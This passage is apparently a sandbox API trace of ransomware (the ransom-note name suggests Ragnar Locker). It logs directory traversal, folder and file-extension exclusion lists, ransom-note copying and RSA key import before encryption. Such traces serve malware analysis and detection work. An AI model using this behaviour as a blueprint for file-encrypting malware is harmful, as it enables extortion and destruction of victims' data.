GetLastError () returned 0x80090016 [0175.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x134c) returned 0x3b4 [0175.631] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0175.706] GetProcessHeap () returned 0x3520000 [0175.707] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586900 | out: hHeap=0x3520000) returned 1 [0175.707] CloseHandle (hObject=0x3f0) returned 1 [0175.707] GetProcessHeap () returned 0x3520000 [0175.707] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0175.708] CloseHandle (hObject=0x3b4) returned 1 [0175.708] GetProcessHeap () returned 0x3520000 [0175.708] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0175.708] FindClose (in: hFindFile=0x3547fc0 | out: hFindFile=0x3547fc0) returned 1 [0175.709] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0175.709] lstrcmpiW (lpString1="1046", lpString2=".") returned 1 [0175.709] lstrcmpiW (lpString1="1046", lpString2="..") returned 1 [0175.709] lstrcmpiW (lpString1="1046", lpString2="Windows") returned -1 [0175.709] lstrcmpiW (lpString1="1046", lpString2="Windows.old") returned -1 [0175.709] lstrcmpiW (lpString1="1046", lpString2="Tor browser") returned -1 [0175.709] lstrcmpiW (lpString1="1046", lpString2="Internet Explorer") returned -1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="Google") returned -1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="Opera") returned -1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="Opera Software") returned -1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="Mozilla") returned -1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="Mozilla Firefox") returned -1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="$Recycle.Bin") returned 1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="ProgramData") returned -1 [0175.710] lstrcmpiW (lpString1="1046", lpString2="All Users") returned -1 [0175.710] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0175.710] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1046" | out: lpString1="1046") returned="1046" [0175.710] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\" [0175.710] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1046\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\" [0175.710] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\!$R4GN4R_B8CF767A$!.txt" [0175.710] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1046\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0175.715] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*" [0175.715] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.716] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.716] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.716] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c80 [0175.716] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0175.716] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf61259f1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.717] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0175.717] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0175.717] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf61259f1, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf61259f1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.717] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0175.717] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0175.717] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.717] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0175.717] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0175.717] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.717] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0175.717] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0175.717] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0175.718] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0175.718] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.718] FindClose (in: hFindFile=0x3547c80 | out: hFindFile=0x3547c80) returned 1 [0175.719] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547fc0 [0175.719] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf61259f1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf61259f1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.720] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf61259f1, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf61259f1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.720] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.720] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0175.720] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0175.720] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0175.720] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.720] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.720] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0175.720] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned=".rtf" [0175.720] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0175.721] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0175.722] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0175.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0175.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0175.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0175.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0175.722] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0175.722] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0175.722] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0175.722] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0175.722] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0175.722] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0175.722] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0175.722] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0175.722] GetProcessHeap () returned 0x3520000 [0175.722] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0175.723] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" [0175.723] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.723] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.723] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0175.723] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned=".xml" [0175.723] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0175.724] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0175.724] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0175.724] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0175.724] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0175.724] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0175.724] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0175.724] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0175.724] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0175.724] GetProcessHeap () returned 0x3520000 [0175.724] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0175.725] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" [0175.725] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.725] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1046\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.725] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0175.725] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned=".dll" [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0175.725] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0175.726] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0175.726] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0175.726] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0175.726] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0175.726] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0175.726] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0175.726] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0175.726] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0175.726] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0175.726] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.726] GetProcessHeap () returned 0x3520000 [0175.726] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586900 [0175.726] CryptAcquireContextW (in: phProv=0x3586900, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586900*=0x5d267c8) returned 1 [0175.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0175.726] GetProcessHeap () returned 0x3520000 [0175.727] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358e748 [0175.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358e748, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0175.727] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.727] GetProcessHeap () returned 0x3520000 [0175.727] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0175.727] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.727] GetProcessHeap () returned 0x3520000 [0175.727] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358e748 | out: hHeap=0x3520000) returned 1 [0175.727] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0175.727] CryptImportPublicKeyInfo (in: hCryptProv=0x5d267c8, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586904 | out: phKey=0x3586904*=0x3547c80) returned 1 [0175.727] GetProcessHeap () returned 0x3520000 [0175.727] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0175.727] LocalFree (hMem=0x35948f0) returned 0x0 [0175.727] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d27048) returned 1 [0175.728] CryptGenRandom (in: hProv=0x5d27048, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0175.728] CryptReleaseContext (hProv=0x5d27048, dwFlags=0x0) returned 1 [0175.728] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.730] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, 